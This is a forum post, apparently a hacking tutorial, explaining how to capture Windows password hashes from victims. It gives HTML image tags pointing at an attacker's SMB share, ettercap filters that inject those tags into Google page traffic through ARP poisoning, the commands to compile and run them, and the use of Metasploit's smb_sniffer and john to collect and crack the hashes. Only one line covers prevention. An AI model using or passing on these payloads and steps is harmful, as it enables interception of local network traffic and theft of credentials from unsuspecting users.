interesting filter idea, I think I'll give it a try tomorrow, just to test and play around.
Capture Password Hashes from Patched Windows Machines
Prerequisites:
the victim is browsing the web from Windows Mozilla(and family) version <2.0.0.6, or I.E.(any version to my knowledge)
How it works:
send the victim malicious html containing a netbios share location
the victims computer will attempt to login to the attackers machine, which is running a fake samba server, set up only to capture the login information from the victim
the html code would be
I.E.<img src="\\192.168.1.100\share\picture.png">
or
Mozilla<img src="moz-icon:file:///%5c/192.168.1.100/share/picture.png">
NOTE: doesn't have to be a real file thats being hosted
ettercap filters replacing google image for that code works nicely
or# googlbios.ie.filter
# replaces http strings transparently, compile with etterfilter
if (ip.proto == TCP && tcp.src == 80) {
replace("/intl/en_ALL/images/logo.gif", "\\192.168.1.100\share\picture.png");
msg("Replaced\n");
}
respectively# googlbios.moz.filter
# replaces http strings transparently, compile with etterfilter
if (ip.proto == TCP && tcp.src == 80) {
replace("/intl/en_ALL/images/logo.gif", "moz-icon:file:///%5c/192.168.1.100/share/picture.png");
msg("Replaced\n");
}
compile like so
etterfilter googlebios.*.filter -o googlbios.ef
(I use ettercap filters a lot for remote code testing, really handy without causing much out of the ordinary in web browsing instead of the google image you could use some small image on a popular web page)
run ettercap, unified sniffing, scan for hosts, arp poisoning, etc..
NOTE: after done manipulating the packets on the network be sure to STOP arp poisoning, and STOP sniffing otherwise you'll DoS the lan
NOTE1: netsed is a "cleaner" alternative to ettercap in this case, you have to look up html escape codes for / and .
on the attackers computer they would be running smb_sniffer from metasploit, which'll send you the password hash
crack with john, and tada
works on all versions of Windows(patched and otherwise), I haven't personally tested it on vista, but I'm told it works the same
Prevention: run a firewall blocking 137-139, 445
Netbios is the biggest security hole in Windows. Disabling it's functionality it generally a smart move.
Jake
More nifty tuts for patched machines coming soon....
maybe I'll stop being such a lazy ass and make a video...
where I got the idea:
hxxp://packetstorm.offensive-security.com/papers/attack/tactical_paper.pdf
hxxp://irongeek.com/i.php?page=security/ettercapfilter
interesting filter idea, I think I'll give it a try tomorrow, just to test and play around.
Posting Permissions